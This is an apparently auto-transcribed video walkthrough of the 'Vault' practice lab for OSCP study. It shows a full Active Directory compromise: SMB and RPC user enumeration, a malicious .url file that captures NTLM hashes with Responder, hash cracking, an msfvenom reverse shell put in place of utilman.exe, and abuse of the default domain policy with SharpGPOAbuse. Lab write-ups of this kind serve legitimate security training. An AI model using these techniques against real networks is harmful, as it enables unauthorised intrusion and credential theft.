What's going on, YouTube? Welcome back to another video. In today's video, we are doing Vault from Proving Grounds practice. Now, this is in preparation for the OSCP, and this is an Active Directory domain. So we start off by trying to enumerate LDAP and trying to enumerate SMB. We do find that we do have write access to an SMB share, and we do use a pretty cool initial access method in order to get a NTLM hash of a user and then get on the box that way. And then we go over two different types of privilege escalation paths, and then we go from there. So without further ado, I don't want to spoil too much. Let's get right into it. Let's go ahead and start off with an nmap scan. So let's do sudo nmap tac-sc for default scripts, tac-sv to enumerate the versions, tac-v to get some verbose output, tac-pn to not use ICMP pings, tac-on to output to a file, call it initial, and put this IP address here. Now, I already did run this because this did take a little bit of time, so we could do less enum initial, take a look at what we've got, and this does look like an Active Directory environment or a domain controller. We do have Kerbrute here, we have RPC, we have LDAP, SMB, NetBIOS. We do have also RDP here, and this is telling us that the fully qualified domain name is dc.vault.offsec, or the domain right here is vault.offsec. Now, if we scroll down a little bit more, we can see that message signing is enabled and required, so I don't believe this is going to allow us to do null authentication on here, although we might be able to have guest authentication. So let's go ahead and add these domain names to our etc host file. So we can go ahead and paste the IP address in here. We could do dc.vault.offsec and vault.offsec. Go ahead and add that in there, and we're good to go on that. So the first thing I want to go ahead and take a look at is normally when you see DNS on TCP, there could be the possibility of a zone transfer. So we can go ahead and just rule that out by doing dig, and then we can do AXFR on vault.offsec at the IP address, enter, and the transfer failed. So we don't have any other subdomains or anything else other than this domain right here. The next thing we can go ahead and try out is ldapsearch to see if we have anonymous LDAP querying possibility, right? So we can do ldapsearch, tac h for URI. We can do ldap : the IP address, tac x for simple authentication, tac s to specify the scope, and that's going to be base and naming contexts to get the naming context. So here we have the naming context of the domain. We can go ahead and copy this, and we can try and query this. Let's do b and specify this base, enter. And so here we are doing the object class of everything to get everything. And we see that we can't get anything because a successful bind must be completed on the connection. That means that we do need valid credentials or authentication to even query information from the LDAP server. So there's nothing that we're going to be able to get from that. So the next thing I want to be able to do, right, is go ahead and check out SMB to see if there's any files in there that we can check out, or even maybe add files to it. So let's do nxc SMB, and then we can do vault.offsec, tac-u, tac-p. Let's try null authentication. We see that we get an access denied, so that means that we don't have null authentication on this server, although we do see a little bit more information here. We see that this is a Windows 10 box, a Server 2019 build with x64 architecture, so this is going to help us whenever we go to add maybe an exploit or a, a binary of this architecture. Now we know what it is, right? So we have the name and the domain here. So the next thing we can try is with a random user. So we could do salu, and we do have guest authentication here, so we can go ahead and list the shares and see what we got here. So we do have one share that is not default. We do have read and write access to this documents share, and then we have read access to this IPC $ share. So this is pretty cool. We can go ahead and check out what's in here. So let's do SMB client, right? And then we can do tag u, I believe. Oh, we could do vault.offsec and then documents share with no one, and we're specifying someone who doesn't exist right here by authenticating as ourselves. We can go ahead and click enter, and we are on the share. So we can do ls, and we don't have anything. So this helps a lot. Now we can just go ahead and exit this. There's not much we can do there at the moment. Although what I do want to do is see if we can validate any users on the box. So there were, I can see that there was Kerbrute on here. So we can go ahead and use Kerbrute, a tool called Kerbrute. If you haven't used that tool before, we can do Kerbrute and GitHub. And we're right here, the first link. This is Kerbrute. So we can go ahead and exit this and do cp opt, or let's actually tack R for recursive, opt and Kerbrute here. Let's cd into Kerbrute and let's do /Kerbrute user enum and then tack dc, and let's do vault.offsec and d for the domain vault.offsec. And we can put a username list. So let's do /optseclist. We can do usernames, Zato, and then .text like this. And we can go ahead and do tac t for threading. And let's just do 100, right? And we'll let this run, see if we find anything there. We can go ahead and split the screen and come up a little bit. And we'll go ahead and leave that running. So the next thing we can do, right, to see if we can validate any users is see if we have guest access to RPC, right? So we can do rpcclient, and then we can do tac u with no one, and then the vault.offsec, or the IP address, whatever you want. Go ahead and click enter, and we do have anonymous RPC or guest access to RPC. The first thing we can do is query dom info, see if we have that, or query dom info. We don't have access to that. Enum dom users, don't have access to that. Let's see, look up names. Okay, so we do have access to look up names. So what we can do with this is, do we have access SIDs? Okay, we do. Awesome. So what we can do with this is validate potential users on the box. So we can do this by doing lookup names and then administrator. And we have the SID of the administrator. Right here is the actual ID of the user, but this is the SID of the domain. So we can go ahead and grab this. We could do lookup SIDs with this SID, and then go ahead and increment by a few numbers and get a couple users off of this. Now, although we're not going to do this manually because this will take forever, there is a script through impacket that does this for us. Now, this is just the manual method of doing it, but this is all that the script is doing. It's just brute forcing the ID number and going from there, right? And just spitting out the user to us. So what we can do is exit this. Let's do lookup SIDs. We could do vault.offsec and then specify nobody with no password at the IP address. Paste that in there. And we can go ahead and click enter. Click enter for no password. And you can see it's starting the brute force of the SIDs. And we get a bunch of users on here, potential users. Now, I can tell you right now, just by looking at this, we have enterprise, guest, KRB, domain admins. These are all groups. It looks like besides the administrator user, the only other actual user on the box is going to be this guy down here. So we do have Anirudh. I'm not sure how to pronounce that, and I'm sorry if I'm killing it. Now, something that we could have done from here is maybe grab this. That's going to be a little bit of waste of time, but if this was a bigger output, we could have grabbed this, put it in a file, grep for user or SID type user, then get the users like that also. But other than that, we only have one user on the box. So let's go ahead and grab this dude. Let's cd ... Let's cd into creds, vi creds, and go ahead and paste this guy in there. and go from there. Now, there's a couple of things that we can do here, right? Although I am inclined to see if we can sort of perform a relay attack or a hash theft attack using that SMB share, right? Considering we do have write access to that share, we can do something called a URL file attack. So if we go here to Firefox and we do URL file attack, click on this first link. If we scroll down here a little bit, this is an awesome read. So if you do want to learn more about this, go ahead and check out this blog post. It does explain a little bit better than how I'm going to explain it. Although right here, right, this is basically a file that goes into a share. And whenever somebody connects to that share, this icon file entry right here, we're going to sort of inject a malicious SMB server right here, which is going to be our IP address. And whenever a user connects to this server, it's going to look for the icon of this file, or the little thumbnail that we see. Let's see on this little thumbnail thing that we have here, like this folder. It's going to see if it can find or grab that icon, right? And what it's going to do is it's going to try to authenticate to this SMB share that we're going to set up. And it's going to try and authenticate to it and give us the user's hash. So what we have here, the icon index, this is always just going to be 1 because it's going to appear at the top of the list. And then we have this, which is the icon file, the working directory, and the URL, which is anything that you want. So let's go ahead and copy this file. Let's do vi capture me.url. Go ahead and paste this in here. And let's go ahead and change what we have here to our IP address. Like this. We can go ahead and save and quit that. And let's do SMB client. Actually, let's do this correctly. Let's move capture me back. Let's create exploit, move capture me to exploits, cd exploits. There we go. Now we can do SMB client, vault.offsec, documents share. Click enter on that. Let's go ahead and set up responder. So we can do sudo responder. Tech I for interface, we can do ton 0 and tech dvw. So this is going to set up a fake W pad that is going to allow for like web authentication. This is, I believe this is a proxy of some type. Hold on, let's see. Let's do responder. Can we do tech help? There you go. Okay, so we have the W pad here with W, and we have DHCP here. Okay, cool. And V for verbose, I believe. Yeah, all right, awesome. So let's do sudo responder, and then tech I, ton 0, dvw. Go ahead and put in that password. If we scroll up, you can see here that we do have an SMB server online. Scroll back down and let's do put capture me.url. Click enter. And let's see if we get anything. All right, look at that. So there does seem to be the user that we have validated through RPCclient is going into this share, taking a look at it, and then getting, trying to authenticate to get the icon of whatever we just, whatever file that we just implanted into the SMB share. Let's go ahead and exit this. Let's go ahead and set this up. Let's do vi hash. Grab this hash. This is an NTLM v2 hash. We can do set paste. paste this in here. And let's do hash, actually, oops. Let's do close this. Hash cat, and then tag m 5600, I believe. Hash, and then opt rock u force. We could see how long this takes. I don't believe this will take that long. Although you never know. Well, here we have it. That works. So we can do show. And here we have the password of SecureHM. Awesome. So let's go ahead and copy this. Let's go vi creds and put this in here like that. And we are good to go. Now we have some valid credentials on the box, and we can do a little bit further enumeration, right? So let's do nxc smb vault.offsec tag u with this guy here. Tag p secure hm. See if these are valid. They are. Shares. Let's see if he has any other access. All right, so we do have read permission to the admin share. We do have read and write permission to the C share, or to the C drive. And that seems to be about it. We have sysvol, so we can go ahead and see get gpp password.py. We can do vault.offsec, and then the username secure hm with the password right there. Then we could do at the IP address. This is just to check if there's any GP passwords in or groups.xml file in the sysvol directory or in the sysvol share. So then we could do tag s for share and sysvol. It's going to list it. It's going to search for XML file. And let's see if it finds anything there. So it doesn't seem to have found anything there. So that's fine. We could just go ahead and cross that off our list. And the next thing I would say to try is let's do nxc rdp with the user. This guy right here. And the password secure hm. Oh, need the target. That might be important. Let's do vault.offsec like that. Right. So it does look like we have access to RDP. So what we can do is we can do what was it? Our desktop. We could do our desktop like this. Tag u with the username. Tag p secure hm and the target, which is vault.offsec. Okay, so here we have unlock the PC. The username and password is incorrect. That's odd. Secure hm. Our desktop. We have okay, p secure hm. That's weird. Okay, so it doesn't look like we have RDP access. That is odd though, because this is the username and password. Let's see. Let's see if we're missing something here. All right, come up here to the top. Okay, we have username. Oh, domain. Maybe specifying the domain. That might help. Let's do dvaults.offsec. Okay, so this, I guess, it fixed the issue of the username being incorrect, but it doesn't seem like we do have access to login through RDP. So that ends that discussion. We can go ahead and do, we can see if WinRM is open. So I think that's what was it, 5989 WinRM port 5985 or 5986. So let's go ahead and do sudo nmap attack p 5986 on vault.offsec. Filtered, so it might be open. We can try it. This is 5986, and let's try 85. Oh, okay. So the 5985 WSMan is open. So we do have evil-winrm, WinRM. So we could do nxc winrm vault.offsec tac u anirudh and tac p secure hm. Okay, cool. So we do have WinRM privileges or remote administration privilege. So we can go and do evil-winrm tac I vault.offsec and tac u tac p secure hm. Oh, wrong password. Capital M. I do want to be able to see this guy's name. So, all right, cool. So we are on the box. So the first thing we can see about doing, right, is let's see. Let's go into the desktop. It's DCI hidden. Desktop ini ls. All right, so we do have the local.txt here on this dude's desktop. Let's go back into documents, DCI hidden to get hidden files. Don't really have much in here. Let's see. Let's go back. Let's go back. Is there any other users on the box? Nope, other than administrator. Let's see. We have this output.txt. All right. So this does looks like some type of a scheduled task, probably. This just output of like a log almost. But we do see that the administrator is running something here. So that might be interesting to view. Freeze script Win 10 PS1. Well, this looks like just an upgrade from Windows 10 probably. So yeah, that doesn't really help us out that much. Let's see what else. What else can we look at? Okay, let's go ahead and do whoami/priv. See the privileges. Okay, so we do have a lot of privileges here. We do have the SeBackupPrivilege, the SeRestorePrivilege, and a couple more that might be interesting to look at later on. Although I know these two are vulnerable to privilege escalation, sort of. I mean, I guess this is a misconfiguration that allows for privilege escalation. So the first thing that we can try, right, is we can try and use the SeBackupPrivilege, which happens to be enabled. Now, one way that we can do this is through diskshadow and robocopy. We can create a script that diskshadow uses to back up the entire drive, and then use robocopy to copy the ntds.dit, and then go ahead and save the system file or the system hive from the registry, and then just use that to, like with a tool such as secrets dump, to dump the ntds.dit hashes, and just go from there, right? So the first thing that we can do, right, let's go over here, let's go to Firefox, let's do SeBackupPrivilege. And we can see if we find something here. Let's try this first one. Okay, so this is a setup. We can come down here to the bottom. And right about here. where did we, all right, right here. So the first thing that we can do, right, is create a script that is going to be run by diskshadow. So if we do diskshadow and then slash question mark, can have the help, and we can see here that we need a script to actually run this. Now we can try interactive mode, although we can see that it does not work. Error reading from console, Win32 error. So that's not gonna work that well. So we can try a script. Let's go ahead and grab this script right here. Go ahead and come down. We can split this screen in half, and we can do vi back.dsh. Go ahead and paste this in here, and we can just change out these aliases. We can do priv and priv. So here, this actually explains everything that is going on in the script. So if you do want to go ahead and take a look at this, this is a great article for understanding like what's actually going on in the back end of this diskshadow script. I believe that the persistent no writers allows us to go ahead and access the backup that we create. It adds the volume alias or just another naming context for the C drive. It's going to be Raj. And then we have this create, which actually creates the backup and then exposes the backup Raj to the Z drive. So now we're going to use this Unix to DOS because right here it converts the encoding and spacing of the Linux file to one that's compatible with a Windows machine. So what we can do is go ahead and save this Unix to DOS and then back.dsh. Boom, got it. And now what we can do is upload back or actually let's go ahead and do cd into Windows temp. We have a couple things in there, although seem to be pretty good. Go ahead and close this, and we can do upload back.dsh. And we have it here. We can see it right here. So what we can do from here is disk shadow and then /s back.dsh. And it doesn't look like we can actually utilize this method. Now, when I was first going through this box, I tried like everything. I searched up this error message or failed message for a long time, trying to fix it, trying to get a workaround, and I just could not do it. Although there is 2 other privilege escalation paths that you can take on this box, this was just something that I could not get to work for the life of me, right? Now, this would most likely work on other boxes, although if you do have a solution for this, or an explanation at least, go ahead and please leave it down in the comments. Like, I really want to understand, because I couldn't even find some articles on why this was happening. So I just want to understand why this is actually happening and see if there's any restrictions in place that we can sort of attempt to get a workaround, right? So just scratching this off of the drawing board, let's go ahead and take a look at BloodHound, right? Let's go ahead and grab SharpHound. So let's do SharpHound GitHub. Come here. And SharpHound is just like a BloodHound Python, like you know how, or a collection agent, right? We could do BloodHound Python. So this script allows us to capture or collect JSON files in order to ingest into the BloodHound client. So that's what SharpHound is, but just for a Windows box, right? So we can just close that out, go back here, download the latest, go to the zip right here, download that, we have it there, and we can go ahead and move it over. We can do CP, and then let's go ahead and go back, and let's see. Let's go into, let's just create a new directory. and then we'll do cp downloads sharphound.zip into here, and then we'll unzip sharphound.zip. So here we have all the SharpHound files. Now what we can do is we can just pwd, grab this, paste it here, and grab this sharphound.exe file, paste it here, and we'll grab all of this, and we could do upload here. Let's see. Okay, so let's go ahead and exit this out. Let's go back and let's go into SharpHound, and then evil-winrm, Windows temp, and then upload sharphound.exe. All right, so this is a viable method of uploading files. Like, it's very simple, right? Like, it's convenient. Although another thing that you could have done, right, is open up an SMB server using impacket on your box and then just copy files over like that. I believe it's way faster. Although this is just convenient, just being able to do it from evil-winrm. It's just, you know, a lot of work. And but one of these boxes, right, one of these times we can go ahead and try that SMB server out and see how it works, right? So here we have the sharphound.exe. All we have to do now is we can do // and then, or / like this, sharphound.exe. Can start that up, have it run, and let's go ahead and open a new terminal. Let's do sudo neo 4j console. See if that works. There you go. Go ahead and start up BloodHound once this finishes. Here we have the link. Can open it up. Go ahead and put in the password. If this is your first time using Neo4j console, you're going to have to input the username and password of Neo4j, and then it's going to prompt you to change the password, and then that's what you're going to have to use every time that you use Neo4j, right? So we can close that, and we could do BloodHound. Open up BloodHound. We could do Neo4j and the password. Come up here, and we can scroll down. You probably won't have to do this, but if you do have data on here, this is how you clear the data. You can come down here and just clear the database and clear the session, and then go from there, right? So let's go back to our other terminal, and this says finished, new dir, and we can see here that we have a bloodhound.zip, so we can do download bloodhound.zip. It's going to download it into, I believe, the what was it, SharpHound folder. So let's go ahead and go into BloodHound. On the right side, we can upload data. Just go to home, OSC, machines, vaults. Let's go into SharpHound, and actually I need to unzip that first. So let's go ahead and go back here, and let's do unzip, or let's make a directory BloodHound. Move BloodHound into BloodHound. Unzip this. Cool. Got that in there. Close that. Go back to BloodHound. Come in here, and here we have all the JSON files. So we can go ahead and copy this, or input this more like. Okay. Doesn't seem to be uploading. Let's go ahead and just restart this. Neo4j. Let's try this again. Okay, there we go. So now it's uploading the data. We can go ahead and close this. And we can start by adding our user to this sort of like data ingestion, right? So we could do what was the guy's name? Here you go. This guy, ANIR. There you go. So we can go ahead and mark this guy as owned. We can go back to our terminal and we can do whoami/all, see what groups we're a part of. So it does seem to be that we are a part of the server operators group and the remote management group. So this server operators group is not a default group, or seems to be enabled by default. So we can just go ahead and add this to here. Server operators, mark, where is it? Mark group as owned. There we go. And we can see what we can find from here, right? So let's do find all domain admins. We have this. We can do shortest path to here. Generic right. So we're not a part of any of these. Let's see. DC sync rights. Okay, only those groups. We don't have anything like that either. Let's see. Dangerous privileges for domain users. Nothing there. Kerbrute accounts. Kerbrute. Not going to happen. Let's see. Don't really have anything from here. Shortest path to high value targets. Nope. No. So it doesn't seem to have any information on any type of privilege escalation that we might be able to take advantage of, right? Or any misconfigurations that we might be able to take advantage of. So what we're going to do, right, is remember, if we see that we have this SeRestorePrivilege, this allows you to modify any system files. So one method that we can do of privilege escalation using the SeRestorePrivilege is modifying the utilman exe, or the utility manager, and that's basically just an executable that is created for ease of access on like a Windows like login screen or lock screen. You can just do Windows U, like Windows key, and then click U, and then that'll open up the utility manager executable, and then you can just do a bunch of settings from there. So one thing that we can do from there is, instead of it actually opening up the utility manager, we can sort of modify another malicious file into being the utility manager, or just naming it the utility manager, so it opens our malicious file instead of the actual legitimate application. So let's go ahead and come up here. Let's just do a reverse shell. So we can do msfvenom, tac-p, Windows x64, and then we can do, or actually, let's cd.dot, cd exploits, venom, tac-p, Windows x64, and then we could do shell reverse TCP lhost equals like that, and we could do lport equals 9999, and then we can do tac f for format of exe and tac o for output of, let's do reverse.exe, like that. We're going to have to get out of this. Go back in, cd Windows temp. All right, and we could do upload reverse.exe. All right, good. It's good to check that it's not just saying data, because then you're going to have to change the a certain option here within msfvenom. So we do have the P32 executable. That is good. We go ahead and upload that here. And now if we do ls, we can see that we have the reverse.exe right here. And so let's go ahead, and this is fairly simple. All we have to do is do mv or move c:/windows system32 util-man.exe to c:/windows system32 and then util-man.backup. We can do that. Go ahead and send that through. And then all we have to do now is move c:/windows temp reverse.exe to c:/windows system32 util-man.exe. All we have to do here is click enter. Fantastic. And right now, it's already set in stone, right? Like we're already done. All we have to do is click Control C, get out of here. Let's go back to the R desktop, open this up. Let's set up the reverse listener. We can do ncat tech nvlp 9999. There you go. And from here, if we click on the actual login page and we do Windows U, we activate the reverse shell. And here we have the reverse shell as NT authority system. So that's one way of privilege escalation on this box. Now there is another way of privilege escalation, and that is through group policy. Now if we go to the default domain, is that how you spell default? Default domain policy, and we do shortest path to here from owned, we see that our user has generic right over this default domain policy, and this default domain policy controls all the computers and users in the domain. So we can essentially add ourselves as a local administrator on the domain controller, which is awesome. So one of the first things that we're going to do, right, is let's go ahead and close out of this. We'll exit out of here. Let's go ahead and actually let's do locate PowerView.ps1. We're going to use PowerView, a couple of PowerView's commands in order to enumerate this a little bit further manually though. Just in case you didn't have access to BloodHound, you can sort of get around it and see if you have these permissions, right? And so let's go ahead and do CP this here. We have that. Fantastic. Let's go ahead and come back down here. Let's go into evil-winrm like that. Boom. And we're in CD Windows temp. There we go. And we can do upload PowerView.ps1. All right, cool. So it's going ahead and uploading that. And once this is done, we can just go ahead, we can just invoke the module for PowerView and then use all of the commands that it has stored, right? So we can do import module and then /PowerView.ps1 like that. And then we can do, there is this one command, right, that allows us to get all the group policies. So we could do get GPO and then it's a tag all. So here we have all the group policies. And here's the one that we were looking at, the default domain policy, right? And so what we can do is grab the ID of this policy like this, grab this, and then we can do another command called get GP permission like this. We can set the GUID to this. We can set the target type to a user, right? And then we can set the target name to our user right here. This guy. copy this, go ahead and paste this in here. And we can see right here the permission on this group policy is edit, delete, modify. So we have all permissions over this group policy, and that's fantastic because now we can use a tool called SharpGPOAbuse, right? If you don't have this tool already, come here, SharpGPOAbuse, right here, the first one. We can go ahead and download that and go from there. So we can locate SharpGPOAbuse.exe. We have it right here. Can grab this from the Sharp collection. And remember x64. We can do CP of this into here. And I believe we're already in the exploits directory. So all we have to do is upload SharpGPOAbuse.exe. And yes, we are. Fantastic. And all we have to do here is, actually, I'll just keep this like this. Right? All we have to do from here is /sharpgpoabuse.exe. And we can see all of the flags that we can use, right? So what we wanted to do is use the add local admin, or we wanted to add ourselves as a local admin on the domain. So right here, we have this add local admin, and this requires a few flags of its own. It has user account and GPO name. Let's go ahead and do this. Let's do add local admin, user account, and then we can do this, grab this guy's name, like that, and then GPO name, like that, and we can do default domain policy, like this, click enter. Now this is going to go through all that, edit the group policy, and finish. And then all we have to do is gpupdate, update the group policy, force to do it right now. And once this finishes, there we go. It's completed successfully. So we can do net user and then our user. And we can see that we are a part of the administrators group now. So we could do ps_exec and then .py, vault.offsec, and then this username with secure HM at the IP address. Just like that, click enter. It found a writable share admin starting the service. And who am I? We are NT authority system on the box. So that is the box. We can go ahead and do cd users administrator and then desktop and get the proof.txt if we wanted to, and then we can go from there. So I hope you guys enjoyed. That is the entire box. I'm sure that there's other ways to do things, and I would be glad to know if you guys have any other methods of privilege escalation. I'm sort of trying to work on that a little bit better, and so we can just go from there, guys. So I hope you guys enjoyed. Hope you learned something, and if you did, leave a like, comment, subscribe, do whatever you want to do, and I'll see you guys in the next one. Take care.